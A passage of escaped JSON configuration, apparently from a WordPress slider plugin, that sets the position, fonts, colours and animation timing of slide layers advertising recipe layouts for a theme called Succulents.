To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":7490,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"image\",\"version\":\"6.6.0\"},\"2\":{\"text\":\"AMAZING LAYOUTS\",\"alias\":\"FOR WORDPRESS\",\"uid\":2,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"244px\",\"e\":true},\"n\":{\"v\":\"-422px\",\"e\":true},\"t\":{\"v\":\"4px\",\"e\":true},\"m\":{\"v\":\"6px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"154px\",\"e\":true},\"n\":{\"v\":\"-326px\",\"e\":true},\"t\":{\"v\":\"-364px\",\"e\":true},\"m\":{\"v\":\"-232px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":6,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8690,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#3c3c3c\",\"e\":true},\"t\":{\"v\":\"#3c3c3c\",\"e\":true},\"m\":{\"v\":\"#3c3c3c\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"v\":\"14px\",\"e\":true},\"n\":{\"v\":\"14px\",\"e\":true},\"t\":{\"v\":\"14px\",\"e\":true},\"m\":{\"v\":\"14px\",\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"v\":\"3px\",\"e\":true},\"n\":{\"v\":\"3px\",\"e\":true},\"t\":{\"v\":\"3px\",\"e\":true},\"m\":{\"v\":\"3px\",\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#3c3c3c\",\"e\":true},\"t\":{\"v\":\"#3c3c3c\",\"e\":true},\"m\":{\"v\":\"#3c3c3c\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"},\"3\":{\"text\":\"Recipes \",\"alias\":\"Recipes \",\"uid\":3,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"239px\",\"e\":true},\"n\":{\"v\":\"-392px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"66px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"204px\",\"e\":true},\"n\":{\"v\":\"-274px\",\"e\":true},\"t\":{\"v\":\"-319px\",\"e\":true},\"m\":{\"v\":\"110px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"e\":true}},\"zIndex\":7,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8690,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#444444\",\"e\":true},\"n\":{\"v\":\"#444444\",\"e\":true},\"t\":{\"v\":\"#444444\",\"e\":true},\"m\":{\"v\":\"#444444\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"Quicksand\",\"fontSize\":{\"d\":{\"v\":\"60px\",\"e\":true},\"n\":{\"v\":\"60px\",\"e\":true},\"t\":{\"v\":\"60px\",\"e\":true},\"m\":{\"v\":\"60px\",\"e\":true}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\",\"e\":true},\"t\":{\"v\":\"700\",\"e\":true},\"m\":{\"v\":\"700\",\"e\":true}},\"letterSpacing\":{\"d\":{\"v\":\"1px\",\"e\":true},\"n\":{\"v\":\"1px\",\"e\":true},\"t\":{\"v\":\"1px\",\"e\":true},\"m\":{\"v\":\"1px\",\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#444444\",\"e\":true},\"n\":{\"v\":\"#444444\",\"e\":true},\"t\":{\"v\":\"#444444\",\"e\":true},\"m\":{\"v\":\"#444444\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"},\"4\":{\"text\":\"Succulents lets you present your amazing recipes in an appealing as well as practical manner with its recipe layouts. \",\"alias\":\"It is a long establi...\",\"uid\":4,\"size\":{\"width\":{\"d\":{\"v\":\"418px\",\"e\":true},\"n\":{\"v\":\"406px\",\"e\":true},\"t\":{\"v\":\"419px\",\"e\":true},\"m\":{\"v\":\"243px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"67px\",\"e\":true},\"n\":{\"v\":\"85px\",\"e\":true},\"t\":{\"v\":\"84px\",\"e\":true},\"m\":{\"e\":true}},\"originalWidth\":\"418px\",\"originalHeight\":\"67px\"},\"position\":{\"x\":{\"d\":{\"v\":\"243px\",\"e\":true},\"n\":{\"v\":\"-297px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"-371px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"266px\",\"e\":true},\"n\":{\"v\":\"-185px\",\"e\":true},\"t\":{\"v\":\"-228px\",\"e\":true},\"m\":{\"v\":\"81px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"e\":true}},\"zIndex\":8,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":8,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8690,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"v\":\"19px\",\"e\":true},\"n\":{\"v\":\"19px\",\"e\":true},\"t\":{\"v\":\"19px\",\"e\":true},\"m\":{\"v\":\"16px\",\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"v\":\"0px\",\"e\":true},\"n\":{\"v\":\"0px\",\"e\":true},\"t\":{\"v\":\"0px\",\"e\":true},\"m\":{\"v\":\"0px\",\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"27px\",\"e\":true},\"n\":{\"v\":\"27px\",\"e\":true},\"t\":{\"v\":\"27px\",\"e\":true},\"m\":{\"v\":\"22px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false},\"type\":\"text\",\"version\":\"6.6.0\"},\"5\":{\"text\":\"Recipe Single\",\"alias\":\"Reacents Post\",\"uid\":5,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"245px\",\"e\":true},\"n\":{\"v\":\"-428px\",\"e\":true},\"t\":{\"v\":\"-428px\"},\"m\":{\"v\":\"-428px\"}},\"y\":{\"d\":{\"v\":\"413px\",\"e\":true},\"n\":{\"v\":\"-66px\",\"e\":true},\"t\":{\"v\":\"-66px\"},\"m\":{\"v\":\"-66px\"}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\"}},\"zIndex\":9,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":9,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8690,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#3c3c3c\",\"e\":true},\"t\":{\"v\":\"#3c3c3c\"},\"m\":{\"v\":\"#3c3c3c\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Quicksand\",\"fontSize\":{\"d\":{\"v\":\"24px\",\"e\":true},\"n\":{\"v\":\"24px\",\"e\":true},\"t\":{\"v\":\"24px\"},\"m\":{\"v\":\"24px\"}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\",\"e\":true},\"t\":{\"v\":\"700\"},\"m\":{\"v\":\"700\